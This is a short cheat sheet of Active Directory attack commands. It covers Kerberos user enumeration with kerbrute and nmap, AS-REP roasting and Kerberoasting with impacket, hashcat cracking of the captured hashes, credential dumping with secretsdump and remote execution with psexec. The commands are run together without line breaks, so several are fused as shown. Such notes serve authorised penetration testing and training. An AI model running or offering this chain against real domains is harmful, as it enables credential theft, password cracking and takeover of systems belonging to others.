AD authentication — enumerate users, AS-REP roast, Kerberoast, and ticket attacks.
kerbrute userenum -d <domain> --dc $t users.txtnmap -p88 --script krb5-enum-users $timpacket-GetNPUsers <domain>/ -usersfile users.txt -dc-ip $t -format hashcat -outputfile asrep.txthashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txtNeeds valid domain creds first.
impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip $t -request -format hashcat -outputfile kerb.txthashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txtimpacket-secretsdump <domain>/<user>:<pass>@$timpacket-psexec <domain>/<user>:<pass>@$t